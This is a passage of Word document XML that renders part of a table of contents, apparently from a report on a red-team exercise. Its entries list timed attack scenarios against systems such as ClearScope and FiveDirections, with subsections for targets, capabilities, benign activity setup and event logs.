            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600140" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.10</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>15:43 -- ClearScope 2 -- Lockwatch APK Java APT</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600140 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>123</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="34EB77CF" w14:textId="55CF653B" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600141" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.10.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141 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>123</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="48601A0A" w14:textId="63712641" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600142" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.10.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142 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>123</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="29D3C34E" w14:textId="05A47967" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600143" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Courier New" w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.10.3</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Benign Activity Setup</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600143 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>123</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3BF860BA" w14:textId="43A8D640" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600144" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Courier New" w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.10.4</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Event Log</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600144 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>123</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="42A38DCC" w14:textId="3E20472B" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600145" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.11</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>16:11 -- FiveDirections 1 -- Verifier Drakon APT FileFilter-Elevate (Cont)</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600145 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>126</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="178396DD" w14:textId="213B2AB6" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600146" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.11.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146 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>126</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2E3F6844" w14:textId="6F2D4B5A" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600147" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.11.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147 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>126</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="518FB339" w14:textId="41ABFAD0" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600148" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Courier New" w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.11.3</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Event Log</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600148 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>126</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="10DB663B" w14:textId="2414C054" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600149" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.12</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>16:20 -- ClearScope 1 -- Tester Micro APT BinFmt-Elevate</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600149 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>128</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4BED94B7" w14:textId="5FED0EC4" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600150" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.12.1</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Targets</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600150 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>128</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="746EFB8E" w14:textId="36792F7D" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600151" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.12.2</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Capabilities</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600151 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>128</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="60B576F0" w14:textId="4D372A69" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600152" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.12.3</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Benign Activity Setup</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600152 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
